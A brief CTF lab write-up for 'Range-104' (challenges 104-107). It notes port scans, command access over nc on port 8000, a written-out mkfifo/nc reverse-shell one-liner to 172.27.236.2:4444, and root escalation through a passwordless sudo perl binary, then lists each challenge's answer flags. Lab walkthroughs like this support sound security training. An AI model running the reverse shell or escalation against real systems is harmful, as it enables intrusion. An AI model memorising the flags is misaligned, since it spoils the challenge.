CTF Range-104 - HackMD

# CTF Range-104 ## Challenge 104 ## Challenge 105 ## Challenge 106 ## Challenge 107 ![image](https://hackmd.io/_uploads/rJJ0aE2Ygl.png) * Rustscan * ![image](https://hackmd.io/_uploads/Syvm1Shtxl.png) * Nmap * ![image](https://hackmd.io/_uploads/r144kBhKgl.png) * 開了8000port但是網頁無法連線, 可以用nc連然後下指令 * ![image](https://hackmd.io/_uploads/H1gobBnYxl.png) * Reverse shell 回來 * ![image](https://hackmd.io/_uploads/SkaAbSnKxe.png) * ![image](https://hackmd.io/_uploads/rkgXfrhtlg.png) ```zsh= rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 172.27.236.2 4444 >/tmp/f ``` * `/home/suiduser/userperl` has sudo permission without password, and userperl just the perl, so follow the GTFObins got shell as root * ![image](https://hackmd.io/_uploads/rJNxmrnKge.png) ## Answer * Challenge 104:`suiduser` * Challenge 105:`hf4km956g` * Challenge 106:`userperl` * Challenge 107:`p76dwmz8c9`